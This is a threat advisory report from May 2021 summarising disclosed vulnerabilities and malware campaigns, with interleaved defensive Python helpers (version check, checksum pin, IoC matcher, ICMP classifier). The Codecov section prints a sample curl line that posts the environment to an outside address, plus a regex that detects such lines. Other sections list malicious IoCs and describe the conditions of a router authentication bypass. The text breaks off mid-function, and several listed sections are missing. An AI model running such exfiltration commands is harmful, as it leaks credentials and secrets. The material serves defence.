BRAINTRACE

THREAT ADVISORY REPORT

MAY 13, 2021

TABLE OF CONTENTS
BACKGROUND
ADMIN ACCOUNTS AND COMMANDS EXECUTED AS ROOT BY CISCO BUG
A NEW QUALCOMM VULNERABILITY
CRITICAL 21NAILS EXIM BUGS
CODECOV COVERAGE TOOL HACKED
NEW TSUNAME DNS BUG
FIVEHANDS ANALYZED BY CISA
ACTIVE DOUBLEDRAG, DOUBLEDROP, AND DOUBLEBACK MALWARE STRAINS
BUER MALWARE VARIANT RE-WRITTEN IN E-Z RUST
NEW PINGBACK MALWARE TARGETING WINDOWS
VULNERABILITIES DISCOVERED ACROSS APPLE'S PRODUCT LINES
AUTHENTICATION BYPASS VULNERABILITY FOUND IN ASUS ROUTER
PORTDOOR MALWARE TAKES DOWN RUSSIAN DEFENSE FIRM
MORIYA ROOTKIT USED TO BACKDOOR WINDOWS SYSTEMS
VPN & CRYPTOCURRENCY CREDENTIALS BEING TARGETED
SIX VULNERABILITIES DISCOVERED WITH REMOTE MOUSE
MILLIONS OF DELL SYSTEMS AT RISK
THE LARGEST PIPELINE IN THE US ATTACKED BY DARKSIDE RANSOMWARE
TWITTER TIP JAR SPARKS PRIVACY CONCERNS
VULNERABILITIES CURRENTLY EXPLOITED BY RUSSIAN
POTENTIAL SECURITY THREATS IN RECYCLED PHONE NUMBERS

BRAINTRACE.COM CONFIDENTIAL 1

BACKGROUND This report was created to update our clients on newly disclosed vulnerabilities, exploits, and malware campaigns that our security team has been tracking. Our team researches threats and vulnerabilities continuously to help you keep your network secure. If you have any questions, do not hesitate to contact us.

ADMIN ACCOUNTS AND COMMANDS EXECUTED AS ROOT BY CISCO BUG Cisco has fixed multiple security flaws in SD-WAN vManage that would allow unauthenticated remote attackers to execute commands as root or create rogue administrator accounts. Cisco also released updates for high- and medium-severity vulnerabilities in other products. Cisco's Product Security Incident Response Team (PSIRT) states that it is not aware of any in-the-wild exploitation of these vulnerabilities at this time.

Affected Systems ◾ Cisco SD-WAN vManage Software

Vulnerability Overview The vulnerabilities are not dependent on one another: an attacker does not need to chain them, and exploiting one is not required to exploit another. They can be exploited in low-complexity attacks that require neither user interaction nor authentication. The bugs, however, only affect vManage software operating in a cluster. To verify whether an instance is running in cluster mode, open the Cisco SD-WAN vManage web-based management interface and go to Administration > Cluster Management. If left unaddressed, these vulnerabilities could allow attackers to cause a denial of service, escalate privileges, and remotely execute arbitrary code.

Recommendation Upgrade Cisco SD-WAN vManage to a fixed release. The Cisco advisory linked below lists the appropriate fixed software release for each affected version.

Patch URL https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ

Reference https://www.bleepingcomputer.com/news/security/cisco-bugs-allow-creating-admin-accounts-executing-commands-as-root/

A NEW QUALCOMM VULNERABILITY A new vulnerability has been discovered in Qualcomm's Mobile Station Modem (MSM), the family of system-on-chip (SoC) designs behind Qualcomm's 2G/3G/4G/5G modems. These chips are used in roughly 40% of the world's mobile phones, including devices from Google, Samsung, OnePlus, LG, and Xiaomi. The modem is an attractive target because compromising it gives an attacker a foothold beneath the Android operating system. One path into the modem is the Qualcomm MSM Interface (QMI), the protocol used for communication between the modem software and the other subsystems on the device; the flaw is a heap overflow in the modem's handling of QMI messages, reachable from the Android side.

Affected Systems ◾ Android devices built on Qualcomm MSM chips

Vulnerability Overview A malicious application on the phone could use the flaw to reach the modem and from there read text messages and call history, listen in on calls, inject hidden malicious code into the modem, and unlock the subscriber identity module (SIM), where the subscriber's authentication credentials are stored.

Recommendation Apply the latest Android security updates. Qualcomm has delivered fixes to device makers, and the flaw is addressed in vendor patches; see the Qualcomm security bulletin below.

Patch URL https://www.qualcomm.com/company/product-security/bulletins

Reference https://www.bleepingcomputer.com/news/security/qualcomm-vulnerability-impacts-nearly-40-percent-of-all-mobile-phones/

CRITICAL 21NAILS EXIM BUGS The Qualys Research Team reported 21 vulnerabilities, collectively named 21Nails, in the Exim mail server. Exim is free software for Unix-like operating systems and ships pre-installed on several Linux distributions. Qualys estimates that Exim runs on about 60% of Internet-facing mail servers, making it the world's most popular mail transfer agent (MTA). Mail servers are an attractive target: once compromised, they can be used to intercept or tamper with email and to pivot further into a network. Exim was already targeted last year, when the Sandworm group exploited an earlier Exim flaw. BinaryEdge scans found roughly 3.56 million Exim servers on the Internet running vulnerable versions.

Affected Systems ◾ All Exim versions before 4.94.2 (some of the flaws date back to 2004)

Vulnerability Overview The 21Nails flaws allow attackers to execute arbitrary code and obtain root privileges on the mail server. Ten of the vulnerabilities are remotely exploitable and eleven are locally exploitable. Chained together, they give an attacker complete control of the server: installing programs, modifying or stealing data, and creating new accounts.


Recommendation Upgrade all Exim installations to version 4.94.2 or later. Distribution packages that backport the fixes may keep a lower version number; check your distribution's security advisory in that case.
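As an added example, not code from Qualys or the Exim project, the check below parses the banner printed by `exim -bV` and reports whether the installed upstream version predates the 4.94.2 fix. `check_local_exim` is a helper name of my own; the sample banners in the comments are constructed.

```python
import re
import subprocess

# First upstream release that carries the 21Nails fixes.
FIXED_VERSION = (4, 94, 2)


def parse_exim_version(banner):
    """Extract the dotted version from the first line of `exim -bV`,
    e.g. 'Exim version 4.94.2 #2 built 07-May-2021' -> (4, 94, 2)."""
    m = re.search(r"Exim version (\d+(?:\.\d+)*)", banner)
    if not m:
        raise ValueError("not an exim -bV banner: %r" % banner)
    parts = [int(p) for p in m.group(1).split(".")]
    parts += [0] * (3 - len(parts))          # '4.94' compares as 4.94.0
    return tuple(parts[:3])


def is_vulnerable(version):
    """True if the upstream version predates 4.94.2."""
    return tuple(version) < FIXED_VERSION


def check_local_exim():
    """Run `exim -bV` on this host. Returns (version, vulnerable), or None
    when no exim binary is on PATH."""
    try:
        proc = subprocess.run(["exim", "-bV"], capture_output=True,
                              text=True, check=False)
    except FileNotFoundError:
        return None
    first_line = proc.stdout.splitlines()[0] if proc.stdout else ""
    version = parse_exim_version(first_line)
    return version, is_vulnerable(version)


if __name__ == "__main__":
    result = check_local_exim()
    if result is None:
        print("exim not found on PATH")
    else:
        version, vuln = result
        print("Exim %s: %s" % (".".join(map(str, version)),
                               "UPGRADE (21Nails)" if vuln else "fixed"))
```

The version comparison is only meaningful for upstream builds: Debian, Ubuntu, and Red Hat backport the fixes into packages whose banner still reads 4.92 or 4.94, so on a distribution-packaged Exim the package changelog, not the banner, is the source of truth.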

Patch URL http://exim.org/mirrors.html

Reference https://www.bleepingcomputer.com/news/security/critical-21nails-exim-bugs-expose-millions-of-servers-to-attacks/

CODECOV COVERAGE TOOL HACKED Codecov provides a tool that measures code coverage, the share of an application's source code that is exercised by its test suite. Its Bash Uploader script, which customers run inside their CI pipelines to send coverage data to Codecov, was modified by an attacker, turning it into a supply-chain compromise of every customer who ran the altered script.

Affected Systems ◾ Codecov clients using their Codecov coverage tool.

Vulnerability Overview The Bash Uploader script collects coverage reports from customers' build environments and uploads them to Codecov. The attacker modified the script at the end of January 2021 so that it also sent the contents of the build environment to an attacker-controlled server. This could have exposed credentials, tokens, and API keys present in CI environment variables, as well as the git remote URLs of the repositories being built.

Codecov attributed the breach to an error in its Docker image creation process that allowed the attacker to extract the credential needed to modify the Bash Uploader script.

Recommendation Rotate all credentials, tokens, and keys that were present in CI environment variables while the altered script was in use. Compare the Bash Uploader in use against the checksum published by Codecov; the malicious version added a curl command near line 525 that posted the environment to a third-party server (see the referenced article for the exact line).
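The two checks that recommendation asks for, as an added example that is not Codecov's code: pin the uploader's SHA-256 in the repository and refuse to run it on a mismatch, and, as a triage aid, flag any line that hands the whole process environment to curl or wget. The sample script is constructed; its line 5 is modelled on the published malicious addition, and 203.0.113.5 is a documentation address standing in for the attacker's server.

```python
import hashlib
import hmac
import re


def sha256_hex(data):
    """SHA-256 of the downloaded script bytes, as lowercase hex."""
    return hashlib.sha256(data).hexdigest()


def verify_pinned(script_bytes, expected_sha256):
    """True only if the script matches the checksum pinned in the repository.
    Constant-time comparison; a mismatch means: do not execute the script."""
    return hmac.compare_digest(sha256_hex(script_bytes),
                               expected_sha256.strip().lower())


# Heuristic for the kind of line the attacker added: a curl/wget call whose
# request body includes the whole process environment.
EXFIL_PATTERN = re.compile(r"\b(curl|wget)\b.*(\$\((env|printenv)\b|`(env|printenv)\b)")


def suspicious_lines(script_text):
    """Return (line_number, line) pairs that match the exfiltration heuristic."""
    return [(n, line.strip())
            for n, line in enumerate(script_text.splitlines(), 1)
            if EXFIL_PATTERN.search(line)]


# Constructed sample script, not the real Bash Uploader.
SAMPLE_SCRIPT = """#!/usr/bin/env bash
# constructed stand-in for a CI upload helper, not the real Bash Uploader
set -e
curl -s https://codecov.invalid/report -F "file=@coverage.xml"
curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://203.0.113.5/upload/v2 || true
echo done
"""

if __name__ == "__main__":
    for n, line in suspicious_lines(SAMPLE_SCRIPT):
        print("line %d: %s" % (n, line))
```

In a pipeline the order matters: download the script, call `verify_pinned` against a hash committed to the repository (Codecov now publishes SHA256SUM files for each uploader release), and abort the job on mismatch. The regex is for incident triage of a script you already suspect; it is not a substitute for the pin, since an attacker can trivially rephrase the exfiltration.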

Reference https://www.bleepingcomputer.com/news/security/popular-codecov-code-coverage-tool-hacked-to-steal-dev-credentials/

NEW TSUNAME DNS BUG The Domain Name System (DNS) is involved in practically every page visit, which makes it an attractive target. Researchers from SIDN Labs, InternetNZ, and the Information Sciences Institute at the University of Southern California have disclosed a DNS vulnerability named TsuNAME that can be abused to launch DDoS attacks against authoritative DNS servers. Google Public DNS and Cisco OpenDNS have already updated their resolvers. Unbound, BIND, and Knot Resolver are not affected.

Affected Systems ◾ Recursive DNS resolvers that loop on cyclic NS dependencies, and the authoritative DNS servers they flood

Vulnerability Overview TsuNAME affects recursive resolvers that mishandle cyclically dependent NS records: two zones whose NS records point at names under each other (for example, example.com delegates to ns1.example.net while example.net delegates to ns1.example.com), so that neither set of name-server addresses can ever be resolved. A vulnerable resolver does not cache the failure and loops, sending a very large number of queries to the authoritative servers for the parent zone. Three ingredients are needed: cyclically dependent NS records, a vulnerable recursive resolver, and user queries that trigger the lookup. The full technical report is available at https://tsuname.io/tech_report.pdf.

Recommendation Mitigations for TsuNAME are available. Authoritative operators can use SIDN's CycleHunter tool to detect cyclic dependencies in their zone files and fix them; resolver operators should make sure their software caches failed delegations and does not loop on them.
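To make the cyclic-dependency condition concrete, here is an added example (my own code, not CycleHunter) that builds a dependency graph between zones from their NS records and reports every cycle. The delegations are constructed sample data, not real zones, and the helper names are mine.

```python
from collections import defaultdict

# Constructed sample delegations, not real zones: zone -> NS hostnames.
# example.com and example.net delegate to each other, which is exactly the
# cyclic dependency TsuNAME needs.
SAMPLE_DELEGATIONS = {
    "example.com.": ["ns1.example.net.", "ns2.example.net."],
    "example.net.": ["ns1.example.com.", "ns2.example.com."],
    "healthy.org.": ["ns1.provider.example.", "ns2.provider.example."],
    "provider.example.": ["a.provider.example."],   # in-bailiwick: needs glue, not a cycle
}


def zone_of(hostname, zones):
    """Return the known zone that contains hostname (longest match), or None."""
    labels = hostname.rstrip(".").split(".")
    for i in range(1, len(labels)):
        candidate = ".".join(labels[i:]) + "."
        if candidate in zones:
            return candidate
    return None


def build_dependency_graph(delegations):
    """Edge A -> B means: resolving A's name servers requires resolving zone B."""
    graph = defaultdict(set)
    for zone, ns_names in delegations.items():
        graph[zone]                       # make sure every zone is a node
        for ns in ns_names:
            host_zone = zone_of(ns, delegations)
            if host_zone and host_zone != zone:
                graph[zone].add(host_zone)
    return graph


def find_cycles(graph):
    """Depth-first search; returns the set of cycles as frozensets of zones."""
    cycles = set()
    state = {}        # node -> "active" while on the DFS path, "done" afterwards

    def visit(node, path):
        state[node] = "active"
        path.append(node)
        for nxt in sorted(graph[node]):
            if state.get(nxt) == "active":
                cycles.add(frozenset(path[path.index(nxt):]))
            elif nxt not in state:
                visit(nxt, path)
        path.pop()
        state[node] = "done"

    for node in sorted(graph):
        if node not in state:
            visit(node, [])
    return cycles


def find_cyclic_delegations(delegations):
    """Sorted list of cyclic zone groups; an empty list means no TsuNAME trigger."""
    graph = build_dependency_graph(delegations)
    return sorted(tuple(sorted(c)) for c in find_cycles(graph))


if __name__ == "__main__":
    for cycle in find_cyclic_delegations(SAMPLE_DELEGATIONS):
        print("cyclic dependency:", " <-> ".join(cycle))
```

For a real zone the input dictionary would be filled from the NS RRsets in the zone file (or from `dig NS` against the authoritative server). Name servers in zones outside the input resolve normally and so create no edge; only delegations that point back into the set of zones being checked can form a loop.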

Patch URL https://github.com/SIDN/CycleHunter

Reference https://www.bleepingcomputer.com/news/security/new-tsuname-dns-bug-allows-attackers-to-ddos-authoritative-dns-servers/

FIVEHANDS RANSOMWARE ANALYZED BY CISA Since 2019, ransomware gangs have stolen data from roughly 2,103 companies, and at least 34 different ransomware groups are active. Some are already heavy hitters, while others are newer but are making a name for themselves. CISA has published an analysis report on one of them, FiveHands, with guidance on what to look for to avoid future attacks.

Affected Systems ◾ Organizations exposing remote-access services such as RDP or SonicWall SMA 100 appliances

Vulnerability Overview FiveHands appears to be the successor of the DeathRansom ransomware and is equally financially motivated. The group behind it exploited a zero-day in SonicWall's SMA 100 appliances for initial access. FiveHands encrypts files with a public-key scheme (NTRUEncrypt) and uses the legitimate Sysinternals PsExec tool to execute its payload, ServeManager.exe, on remote hosts. It deletes Volume Shadow Copies to prevent data recovery. The payload is delivered by a 32-bit loader that takes a key as a command-line argument, decodes an embedded module with that key in memory, checks that the decoded module has a valid PE header, and only then executes it.

Recommendation CISA recommends the following actions to reduce the risk from FiveHands and other ransomware actors:
◾ Maintain up-to-date antivirus signatures and engines.
◾ Keep operating system patches up to date.
◾ Restrict users' ability (permissions) to install and run unwanted software applications.
◾ Do not add users to the local administrators group unless required.
◾ Implement multi-factor authentication (MFA), particularly on all VPN connections, external-facing services, and privileged accounts. Where MFA is not implemented, enforce a strong password policy and implement regular password changes.
◾ Decommission unused VPN servers, which may act as a point of entry for attackers.
◾ Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known.
◾ Enable a personal firewall on workstations, configured to deny unsolicited connection requests.
◾ Scan for and remove suspicious email attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
◾ Monitor users' web browsing habits; restrict access to sites with unfavorable content.
◾ Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).
◾ Scan all software downloaded from the internet before executing.

Reference
https://www.securityweek.com/cisa-analyzes-fivehands-ransomware
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a

ACTIVE DOUBLEDRAG, DOUBLEDROP, AND DOUBLEBACK MALWARE STRAINS On May 4, 2021, FireEye researchers disclosed three new malware families, DOUBLEDRAG, DOUBLEDROP, and DOUBLEBACK, first observed in December 2020. The threat actor behind the campaign is tracked as UNC2529. Targets in the US, Europe, Asia, and Australia received tailored phishing emails, and the actor is known to have used more than 50 domains in the campaign.

Affected Systems ◾ All Systems


Vulnerability Overview The phishing emails carried URLs leading to a .zip archive containing a decoy PDF and a JavaScript file; the .js file is the DOUBLEDRAG downloader. Other variants used Excel documents with a macro that delivered the same payload. DOUBLEDRAG retrieves DOUBLEDROP, an obfuscated PowerShell dropper that loads the DOUBLEBACK backdoor into memory on the victim's device.

Indicators of Compromise
MD5:
◾ 39fc804566d02c35f3f9d67be52bee0d
◾ 44f7af834ee7387ac5d99a676a03cfdd
◾ 4e5583e34ad54fa7d1617f400281ba5
◾ e80dc4c3e26deddcc44e66bb19b6fb5
◾ 169c4d96138d3ff73097c2a9aab5b1c0
◾ e70502d020ba707095d46810fd32ee49
◾ 62fb99dc271abc104504212157a4ba91
◾ 1d3fcb7808495bd403973a0472291da5
◾ 6a1da7ee620c638bd494f4e24f6f1ca9
◾ a28236b43f014c15f7ad4c2b4daf1490
◾ d594b3bce66b8b56881febd38aa075fb

Domains:
◾ adupla[.]net
◾ aibemarle[.]com
◾ ceylonbungalows[.]net
◾ bestwalletforbitcoin[.]com
◾ chandol[.]com
◾ bitcoinsacks[.]com
◾ closetdeal[.]com
◾ digitalagencyleeds[.]com
◾ daldhillon[.]com
◾ erbilmarriott[.]com
◾ desmoncreative[.]com
◾ ethernetpedia[.]com
◾ farmpork[.]com
◾ fileamazon[.]com
◾ gemralph[.]com
◾ gamesaccommodationscotland[.]com
◾ isjustlunch[.]com
◾ greathabibgroup[.]com
◾ logicmyass[.]com
◾ infomarketx[.]com
◾ lottoangels[.]com
◾ jagunconsult[.]com
◾ mangoldsengers[.]com
◾ khodaycontrolsystem[.]com
◾ oconeeveteransmemorial[.]com


◾ maninashop[.]com
◾ scottishhandcraft[.]com
◾ onceprojects[.]com
◾ seathisons[.]com
◾ simcardhosting[.]com
◾ skysatcam[.]com
◾ stayzarentals[.]com
◾ smartnhappy[.]com
◾ touristboardaccommodation[.]com
◾ stepearn[.]com
◾ towncentrehotel[.]com
◾ sugarmummylove[.]com
◾ vacuumcleanerpartsstore[.]com
◾ techooze[.]com
◾ zmrtu[.]com
◾ tigertigerbeads[.]com
◾ totallyhealth-wealth[.]com
◾ towncenterhotel[.]com
◾ uaeworkpermit[.]com

MD5:
◾ 4b32115487b4734f2723d461856af155
◾ 9e3f7e6697843075de537a8ba83da541
◾ cc17e0a3a15da6a83b06b425ed79d84c

URLs:
◾ hxxp://p-leh[.]com/update_java.dat
◾ hxxp://clanvisits[.]com/mini.dat
◾ hxxps://towncentrehotels[.]com/ps1.dat

DOUBLEBACK:

MD5:
◾ 1aeecb2827babb42468d8257aa6afdeb
◾ 1bdf780ea6ff3abee41fe9f48d355592
◾ 1f285e496096168fbed415e6496a172f
◾ 6a3a0d3d239f04ffd0666b522b8fcbaa
◾ ce02ef6efe6171cd5d1b4477e40a3989
◾ fa9e686b811a1d921623947b8fd56337

URLs:
◾ hxxps://klikbets[.]net/admin/client.php
◾ hxxps://lasartoria[.]net/admin/client.php
◾ hxxps://barrel1999[.]com/admin4/client.php
◾ hxxps://widestaticsinfo[.]com/admin4/client.php
◾ hxxps://secureinternet20[.]com/admin5/client.php
◾ hxxps://adsinfocoast[.]com/admin5/client.php


Recommendation Apply standard defensive measures against phishing, and search DNS, proxy, mail, and endpoint logs regularly for the indicators of compromise listed above; catching an indicator early can prevent a foothold from turning into a full compromise.

Reference
https://www.zdnet.com/article/researchers-find-three-new-malware-families-used-in-global-finance-phishing-campaign/
https://www.fireeye.com/blog/threat-research/2021/05/unc2529-triple-double-trifecta-phishing-campaign.html

BUER MALWARE VARIANT RE-WRITTEN IN E-Z RUST A new variant of the Buer loader is being spread via emails disguised as DHL shipping notices. Buer is sold as malware-as-a-service (MaaS), and this variant, which Proofpoint calls RustyBuer, has been rewritten in Rust, a newer language that is gaining popularity with malware authors.

Affected Systems ◾ All Systems

Vulnerability Overview The loader now comes in two flavors: one written in Rust and the original written in C. Rewriting the malware in a different language changes its code signatures and can help it evade antimalware detection. Buer itself is a first-stage downloader that threat actors use to gain a foothold and persistence on a network. The email carries an Excel document with an embedded macro; once macros are enabled, the loader is installed and contacts its command-and-control (C2) servers for additional payloads and instructions.

Indicators of Compromise
Domains:
◾ Serevalutinoffice[.]com
◾ orderverification-api[.]com
◾ Gerstaonycostumers[.]com
◾ authcert-ca[.]com
◾ ocumentssign-api[.]com
◾ docusigner-api[.]com

URLs:
◾ Miyfandecompany[.]com
◾ https://cembank-api[.]com

Emails:
◾ [email protected][.]uk
◾ Hernandez@ubstreasury[.]biz
◾ [email protected][.]uk


◾ Patterson@ubstreasury[.]biz
◾ Campbell@rockyourstay[.]net
◾ Henderson@fossilqwanderer[.]org
◾ Powell@onlinefundraisingtoday[.]org
◾ Evans@onlinefundraisingtoday[.]org
◾ Brooks@fossilqwanderer[.]org

SHA256:
◾ A061180b16f89099da6d34c5a3976968c19a3977c84ce0711ddfef6f7c355cac
◾ 3abed86f46c8be754239f8c878f035efaae91c33b8eb8818c5bbed98c4d9a3ac

Recommendation As with most malware campaigns, the attack relies on a phishing email as its first step. User awareness training, email filtering, and blocking macros in Office documents that arrive from the internet, combined with standard security practices, stop these attacks before they begin.
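The UNC2529 indicators above and the Buer indicators in this section are both published defanged (hxxp, [.]). The matcher below, an added example rather than code from FireEye, Proofpoint, or this report, refangs a handful of those indicators and checks them against constructed DNS, proxy, file-hash, and mail events. The event schema (`type`, `host`, `url`, `md5`, `sender`) is an assumption of my own, and the events are not real telemetry.

```python
import re
from urllib.parse import urlparse


def refang(ioc):
    """Turn a defanged indicator ('hxxps://', '[.]') back into its live, lowercase form."""
    s = ioc.strip()
    s = re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.IGNORECASE)
    return s.replace("[.]", ".").replace("[:]", ":").replace("[@]", "@").lower()


def host_matches(host, ioc_domain):
    """Exact match or a subdomain of the indicator domain (never a suffix of a label)."""
    return host == ioc_domain or host.endswith("." + ioc_domain)


def match_events(events, iocs):
    """Return (ioc_type, indicator, event_index) for every event that hits an IoC."""
    live = {kind: {refang(v) for v in values} for kind, values in iocs.items()}
    domains = sorted(live.get("domain", ()))
    hits = []
    for idx, ev in enumerate(events):
        kind = ev["type"]
        if kind == "dns":
            host = ev["host"].lower().rstrip(".")
            hits += [("domain", d, idx) for d in domains if host_matches(host, d)]
        elif kind == "http":
            url = ev["url"].lower()
            if url in live.get("url", ()):
                hits.append(("url", url, idx))
            else:                                   # fall back to the URL's host
                host = urlparse(url).hostname or ""
                hits += [("domain", d, idx) for d in domains if host_matches(host, d)]
        elif kind == "file":
            digest = ev["md5"].lower()
            if digest in live.get("md5", ()):
                hits.append(("md5", digest, idx))
        elif kind == "mail":
            sender = ev["sender"].lower()
            if sender in live.get("email", ()):
                hits.append(("email", sender, idx))
            else:                                   # unknown mailbox on a known domain
                sender_domain = sender.rsplit("@", 1)[-1]
                hits += [("domain", d, idx) for d in domains if host_matches(sender_domain, d)]
    return hits


# A few indicators copied from the lists above, still defanged.
IOCS = {
    "domain": ["adupla[.]net", "towncentrehotel[.]com", "docusigner-api[.]com"],
    "url": ["hxxps://klikbets[.]net/admin/client.php"],
    "md5": ["39fc804566d02c35f3f9d67be52bee0d"],
    "email": ["Patterson@ubstreasury[.]biz"],
}

# Constructed telemetry, not real logs.
SAMPLE_EVENTS = [
    {"type": "dns", "host": "www.adupla.net."},
    {"type": "http", "url": "https://klikbets.net/admin/client.php"},
    {"type": "file", "md5": "39FC804566D02C35F3F9D67BE52BEE0D"},
    {"type": "mail", "sender": "patterson@ubstreasury.biz"},
    {"type": "mail", "sender": "billing@docusigner-api.com"},
    {"type": "dns", "host": "notadupla.net"},          # must not match: not a subdomain
    {"type": "http", "url": "https://example.org/admin/client.php"},
]

if __name__ == "__main__":
    for ioc_type, indicator, idx in match_events(SAMPLE_EVENTS, IOCS):
        print("event %d matched %s %s" % (idx, ioc_type, indicator))
```

Two details are deliberate: the suffix check requires a leading dot so `notadupla.net` does not match `adupla.net`, and a sender address is only reported once (exact mailbox first, otherwise its domain), so one event never produces duplicate alerts.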

Reference
https://threatpost.com/buer-malware-loader-rewritten-rust/165782/
https://www.proofpoint.com/us/blog/threat-insight/new-variant-buer-loader-written-rust

NEW PINGBACK MALWARE TARGETING WINDOWS Researchers have disclosed a new malware family, dubbed PingBack, targeting 64-bit Microsoft Windows systems. The malware is a 64-bit DLL that achieves persistence through DLL hijacking and communicates with its operators over ICMP, a protocol many networks allow through without inspection.

Affected Systems ◾ Windows

Vulnerability Overview The file that carries the malware is a 66 KB DLL named oci.dll, planted in the Windows System folder by an earlier malicious process. What makes PingBack unusual is how it is loaded: rather than being launched with rundll32.exe, it relies on DLL hijacking, the practice of placing a malicious DLL where a trusted Windows component will find and load it in place of the legitimate library. Here the Microsoft Distributed Transaction Coordinator service (msdtc) loads oci.dll, which is how the malware starts. Once loaded, PingBack uses ICMP echo packets to receive further instructions from a C2 server, hiding its traffic inside what looks like ordinary ping activity.

It is still being investigated how the DLL ends up in the Windows System folder. Researchers suspect that another piece of malware, a malicious updata.exe, drops the DLL and configures msdtc to load it.
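Because PingBack's channel is ICMP echo traffic, the useful network check is whether echo payloads look like what real ping tools send. The parser below is an added example, not Trustwave's code or PingBack's protocol: it builds and parses ICMP echo packets, verifies the RFC 1071 checksum, and flags payloads that match neither the Windows ping filler nor the iputils pattern. The two baseline payloads are the tools' defaults; the packets in `SAMPLE_PACKETS` are constructed.

```python
import struct

# Default echo payloads, for baselining: Windows ping sends the 32-byte
# alphabet string; iputils ping sends an 8-byte timestamp followed by the
# bytes 0x08..0x37. Verify both against captures from your own network.
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"
IPUTILS_PATTERN = bytes(range(8, 56))


def icmp_checksum(data):
    """RFC 1071 ones'-complement checksum over the ICMP header and payload."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp_echo(ident, seq, payload, icmp_type=8):
    """Build an ICMP echo request (type 8) or reply (type 0) with a valid checksum."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def parse_icmp(packet):
    """Split an ICMP packet (IP header already removed) into fields and verify the checksum."""
    if len(packet) < 8:
        raise ValueError("truncated ICMP packet")
    icmp_type, code, csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    recomputed = icmp_checksum(packet[:2] + b"\x00\x00" + packet[4:])
    return {"type": icmp_type, "code": code, "id": ident, "seq": seq,
            "payload": packet[8:], "checksum_ok": recomputed == csum}


def looks_like_standard_ping(payload):
    if payload == WINDOWS_PING_PAYLOAD:
        return True
    return len(payload) == 56 and payload[8:] == IPUTILS_PATTERN


def classify_echo(packet):
    """'standard-ping', 'suspicious-payload', 'bad-checksum' or 'not-echo'."""
    p = parse_icmp(packet)
    if p["type"] not in (0, 8):
        return "not-echo"
    if not p["checksum_ok"]:
        return "bad-checksum"
    return "standard-ping" if looks_like_standard_ping(p["payload"]) else "suspicious-payload"


# Constructed packets: a normal Windows ping and a tunnel-style echo whose
# payload carries a command instead of the usual filler.
SAMPLE_PACKETS = [
    build_icmp_echo(0x0001, 1, WINDOWS_PING_PAYLOAD),
    build_icmp_echo(0x1234, 7, b"\x00\x01" + b"cmd:whoami" + b"\x00" * 100),
]

if __name__ == "__main__":
    for pkt in SAMPLE_PACKETS:
        p = parse_icmp(pkt)
        print("id=%#06x seq=%d len=%d -> %s"
              % (p["id"], p["seq"], len(p["payload"]), classify_echo(pkt)))
```

Feed it the ICMP portion of packets from a capture (the IPv4 header length is in the low nibble of the first IP byte, times four). Monitoring tools such as NetworkMiner or Wireshark can apply the same idea as a filter; what matters is that unusual payload sizes, high-entropy content, or many echo requests to one host with no matching reply size are all out of profile for a ping.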

For a complete list of known IoCs, see https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel/

Recommendation Maintain strong baseline security practices. To check for PingBack, search hosts for the known IoCs (in particular an unexpected oci.dll loaded by the msdtc service) and monitor the network for ICMP echo traffic with unusual payloads.

Reference https://www.bleepingcomputer.com/news/security/new-windows-pingback-malware-uses-icmp-for-covert-communication/

VULNERABILITIES DISCOVERED ACROSS APPLE'S PRODUCT LINES Multiple vulnerabilities have been found in Apple platforms from watchOS to macOS, including an integer overflow, a buffer overflow, a use-after-free, and memory corruption bugs, all in the WebKit browser engine. Successful exploitation could allow an attacker who lures the user to a malicious web page to bypass security restrictions and execute arbitrary code with the privileges of the currently logged-in user.

Affected Systems ◾ iOS versions before 12.5.3 & 14.5.1. ◾ iPadOS versions before 14.5.1. ◾ macOS Big Sur versions before 11.3.1. ◾ watchOS versions before 7.4.1.

Vulnerability Overview A brief list of the vulnerabilities is given below:

CVE-2021-30661 is a use-after-free in WebKit Storage, fixed in iOS 12.5.3 through improved memory management.

CVE-2021-30663 is an integer overflow in WebKit, fixed in iOS 14.5.1, iPadOS 14.5.1, iOS 12.5.3, and macOS Big Sur 11.3.1 through improved input validation.

CVE-2021-30665 is a memory corruption issue in WebKit, fixed in watchOS 7.4.1, iOS 14.5.1, iPadOS 14.5.1, iOS 12.5.3, and macOS Big Sur 11.3.1 through improved state management.

CVE-2021-30666 is a buffer overflow in WebKit, fixed in iOS 12.5.3 through improved memory handling.

Apple notes that all four issues may have been actively exploited in the wild.

Recommendation Apply Apple's patches as they are released, run software under a non-privileged account where possible, avoid downloading files from untrusted sources, and review the read, write, and execute permissions of newly installed software.


Reference https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-apple-products-could-allow-for-arbitrary-code-execution_2021-059/

AUTHENTICATION BYPASS VULNERABILITY FOUND IN ASUS ROUTER An authentication bypass (CVE-2021-32030) has been disclosed in the ASUS GT-AC2900 wireless router with firmware before 3.0.0.4.386.42643. The flaw is triggered while processing a request from a remote, unauthenticated user and lets an attacker reach the administrator interface without credentials.

Affected Systems ◾ ASUS GT-AC2900 with firmware versions before 3.0.0.4.386.42643.

Vulnerability Overview The router tracks sessions with a cookie named asus_token. Session validation fails when three conditions coincide: the asus_token value begins with a null byte (0x00), the request's User-Agent matches an internal service user-agent string, and the router has no ifttt_token configured. In that case the device's handle_request function treats the request as authenticated, even though every one of those conditions is under the attacker's control.
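The following is an added model of that logic, written for this report and not the firmware's code: the first function reproduces the flawed decision as described (null-prefixed token plus internal user-agent plus no ifttt_token), the second shows the hardened form. The internal user-agent string is a placeholder, and the device state and requests are constructed.

```python
import hmac

# Placeholder for the internal service user-agent the firmware checks; the
# real string is not reproduced here.
INTERNAL_SERVICE_UA = "internal-service-ua"


def is_authenticated_vulnerable(request, device):
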